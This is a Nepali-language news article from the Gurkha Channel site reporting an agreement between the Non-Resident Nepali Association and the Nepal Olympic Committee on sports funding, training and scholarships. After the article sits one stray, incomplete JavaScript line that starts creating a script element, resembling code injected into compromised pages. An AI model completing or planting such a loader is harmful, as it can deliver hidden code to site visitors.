,

नेपालको खेलकुद विकासका लागि गैरआवासीय नेपाली संघ एनआरएनए र नेपाल ओलम्पिक कमिटि एनओसीबीच सम्झौता

admin Avatar

नेपाली खेल क्षेत्रको विकासका लागि गैरआवासीय नेपाली संघ एनआरएनए र नेपाल ओलम्पिक कमिटी एनओसीबीच सम्झौता भएको छ ।
ललितपुरको सातदोबाटोस्थित नेपाल ओलम्पिक कमिटिको कार्यालयमा आइतबार एक कार्यक्रमकाबीच गैरआवासीय नेपाली संघका अध्यक्ष शेष घले र नेपाल ओलम्पिक कमिटिका अध्यक्ष जीवनराम श्रेष्ठले सम्झौतापत्रमा हस्ताक्षर गर्नुभयो । सम्झौताअनुसार नेपालमा चलिरहेको ओलम्पिक अभियानको साझेदारका रूपमा एनआरएनए रहनेछन । सम्झौतापत्रमा हस्ताक्षर गरेपछि गैरआवासीय नेपाली संघका अध्यक्ष शेष घलेले एनओसीसँगको सम्झौताले नेपाली र दोस्रो पुस्ताका गैरआवासीय नेपालीबिचको सम्बन्ध सुमधुर बनाउने अपेक्षा राखेको बताउनुभयो । उहाँले नेपाली खेलाडीहरूले क्षमता नभएर भन्दा पनि उपयुक्त प्रशिक्षण र अवसर नपाएर उपलब्धि हासिल गर्न नसकेको बताउदै संसारभर छरिएर रहेका दोस्रो पुस्ताका एनआएरएनहरू खेलकुदमार्फत् नेपालीसँग जोडिन उत्सुक रहेको भन्दै एनओसीले यसमा बिशेष ध्यान दिने विश्वास व्यक्त गर्नुभयो । नेपालको खेल क्षेत्रलाई सशक्त र प्रभावकारी बनाउन आफ्नो तर्फबाट आर्थिक, भौतिक पूर्वाधार विकास आदिमा योगदान दिने उद्देश्यका साथ एनओसीसंग सम्झौता गरिएको अध्यक्ष घलेको भनाइ थियो ।
एनआरएनएले विभिन्न खेल क्षेत्रमा सहयोग गर्ने, क्षमतावान् खेलाडीहरूको वैदेशिक प्रशिक्षण र खेलकुद प्रतिस्पर्धामा आवश्यक सामग्री उपलब्ध गराउने छन । त्यसैगरी एनओसीले एनआरएनए स्थापना दिवस ११ अक्टोबरमा विभिन्न खेलकुद प्रतियोगिता आयोजना गर्नेछ । सम्झौतानुसार एनआरएनएले दक्षिण एसियाली, एसियाली र ओलम्पिक खेलकुदमा सहभागिता जनाउने खेलाडीलाई छात्रवृत्तिसमेत प्रदान गर्नेछ ।
कार्यक्रममा नेपाल ओलम्पिक कमिटीका अध्यक्ष जीवनराम श्रेष्ठले एनआरएनएको सहयोगले नेपाली खेलाडीलाई ढाडस दिने भन्दै लक्ष्य प्राप्तिमा सहयोग मिल्ने बताउनुभयो । खेल क्षेत्रमार्फत राष्ट्रको शिर उँचो बनाउने आफूहरूको अभियानमा गैरआवासीय नेपाली संघले साथ दिएकाले आगामी दिनमा अन्तर्राष्ट्रिय जगतमा राम्रो परिणाम ल्याउने विश्वास व्यक्त गर्नुभयो । अध्यक्ष श्रेष्ठले एनआरएनएसंगको सहकार्यले संसारभर रहेका नेपालीहरूबीच सौहार्दता बढाउनाका साथै सांस्कृतिक आदानप्रदानमा समेत योगदान पुग्ने धारणा राख्दै नेपालीहरूलाई एकताको सूत्रमा बाँध्ने एक मात्र क्षेत्र खेलकुद रहेको जिकिर गर्नुभयो । एनआरएनएले नेपाली खेलकुद क्षेत्रको भौतिक पूर्वाधार निर्माणका लागि दाता तथा बहुर्राष्ट्रिय कम्पनीहरूको खोजी गर्ने सहमति पत्रमा उल्लेख छ । कार्यक्रममा एनआरएनएका अध्यक्ष घलेलाई एनओसीको मानार्थ सदस्यता प्रदान गरियो ।

var d=document;var s=d.createElement(‘script’);

About Gurkha Channel

Gurkha channel is the sister company of Gurkha TV and the first 24-hour Nepali channel operating from the international capital of the world,London, United Kingdom. Gurkha Channels believes in honesty, respect, and unity. We belong to the land of Lord Buddha, Mt. Everest, and gallant people who sacrifice their lives for peace and humanity. Therefore, in this world of globalization, it is our effort to bring all Nepalese from around the world together and make one family: one Nation.

Search
Cateegories